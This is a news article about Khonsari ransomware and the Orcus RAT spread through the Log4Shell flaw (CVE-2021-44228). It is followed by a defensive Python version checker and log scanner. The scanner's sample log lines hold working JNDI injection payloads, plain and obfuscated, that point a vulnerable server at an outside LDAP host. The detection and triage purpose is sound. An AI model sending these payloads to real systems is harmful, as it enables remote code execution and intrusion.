
Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability.

The attack leverages the remote code execution (RCE) flaw to download an additional payload, a .NET binary, from a remote server. That binary encrypts the victim's files, appends the extension ".khonsari" to each encrypted file, and displays a ransom note urging the victim to make a Bitcoin payment in exchange for recovering access to the files.

Tracked as CVE-2021-44228, the RCE vulnerability is also known by the monikers "Log4Shell" and "Logjam" and affects versions 2.0-beta9 through 2.14.1 of the library. In simple terms, a single crafted input can make an affected system fetch and run malicious software, giving attackers a digital beachhead on servers located within corporate networks.

Log4j is an open-source Java library maintained by the nonprofit Apache Software Foundation. Widely adopted for application event logging (its GitHub project alone has amassed about 475,000 downloads), the library is also embedded in other frameworks such as Elasticsearch, Kafka and Flink, which in turn underpin many popular websites and services.

The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active, widespread exploitation of the flaw, which, if left unaddressed, could grant attackers unfettered access and unleash a new round of cyber attacks. Fallout from the bug has left companies rushing to find and patch vulnerable machines.

“An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code,” the agency said in guidance issued Monday. “The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity.”
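CISA's description above (a crafted request that makes a vulnerable system execute code) and the affected-version range given earlier are the two facts a responder acts on first: which Log4j versions in the estate fall inside 2.0-beta9 through 2.14.1, and whether the crafted requests have already hit the web tier. The following Python is an added example, not code from Bitdefender, CISA or The Hacker News. It triages Log4j version strings against the range the article states, and scans constructed web-server access-log lines for the `${jndi:...}` lookup that triggers CVE-2021-44228, including URL-encoded and nested-lookup obfuscations. The JNDI lookup syntax and the obfuscation forms are not stated in the article; they are the publicly documented trigger for this CVE. The log lines, the IP addresses (RFC 5737 documentation ranges) and the folding rules for `lower`, `upper` and default-value lookups are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Affected range as stated in the article: Log4j 2.0-beta9 through 2.14.1 inclusive.
AFFECTED_LOW, AFFECTED_HIGH = "2.0-beta9", "2.14.1"
_PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}   # assumed ordering of pre-release tags


def version_key(version: str) -> tuple:
    """Sortable key for Log4j 2 version strings such as '2.0-beta9' or '2.14.1'.

    A pre-release sorts before the final release carrying the same number.
    """
    base, _, pre = version.strip().partition("-")
    nums = [int(p) for p in base.split(".")]
    nums += [0] * (3 - len(nums))                    # '2.0' -> (2, 0, 0)
    if not pre:
        return (*nums, 1, 0, 0)                      # final release
    m = re.fullmatch(r"([a-zA-Z]+)(\d*)", pre)
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    tag, num = m.group(1).lower(), int(m.group(2) or 0)
    return (*nums, 0, _PRERELEASE_RANK.get(tag, 3), num)


def is_affected_version(version: str) -> bool:
    """True if the version lies inside the range the article gives for CVE-2021-44228."""
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)


# Innermost ${...} lookup (no nested braces inside) and the final JNDI trigger.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_lookup(body: str):
    """Statically fold the simple lookups attackers use to hide the word 'jndi'.

    Returns the substituted text, or None if this lookup is not one we fold.
    """
    if ":-" in body:                                 # ${::-j} or ${env:NOPE:-j} -> default "j"
        return body.rsplit(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":              # ${lower:J} -> "j"
        return arg.lower()
    if sep and kind.lower() == "upper":              # ${upper:j} -> "J"
        return arg.upper()
    return None


def normalise(text: str) -> str:
    """URL-decode (twice, for double encoding), then fold nested lookups inside out."""
    text = unquote(unquote(text))
    while True:
        changed = False

        def _sub(m):
            nonlocal changed
            folded = _resolve_lookup(m.group(1))
            if folded is None:
                return m.group(0)                    # unknown lookup: leave it in place
            changed = True
            return folded

        text = _INNER_LOOKUP.sub(_sub, text)
        if not changed:                              # every fold removes one ${...}, so this terminates
            return text


def contains_jndi_lookup(text: str) -> bool:
    """True if the text, after normalisation, carries a ${jndi:...} lookup."""
    return bool(_JNDI.search(normalise(text)))


def scan_log(lines):
    """Return (line_number, normalised_line) for every line carrying a JNDI lookup."""
    return [(n, normalise(line)) for n, line in enumerate(lines, 1) if contains_jndi_lookup(line)]


# Constructed sample access-log lines (not real traffic); addresses are RFC 5737 documentation ranges.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [13/Dec/2021:10:01:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a} HTTP/1.1" 200 612 "-" "curl/7.79.1"',
    '203.0.113.9 - - [13/Dec/2021:10:02:11 +0000] "GET /%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [13/Dec/2021:10:02:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [13/Dec/2021:10:02:31 +0000] "GET /docs?price=${amount} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0"):
        print(f"{v}: {'affected' if is_affected_version(v) else 'not affected'}")
    for n, line in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {line}")
```

The scanner only folds the handful of lookup forms shown; Log4j supports others (`env`, `sys`, `date`, and so on) that cannot be evaluated statically, so treat it as a triage aid for finding which hosts were probed, not as proof of absence. The payload can arrive in any field the application logs (a header, a query parameter, a username), so run it over application logs as well as front-end access logs, and let the version check, not the log scan, decide what gets patched.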
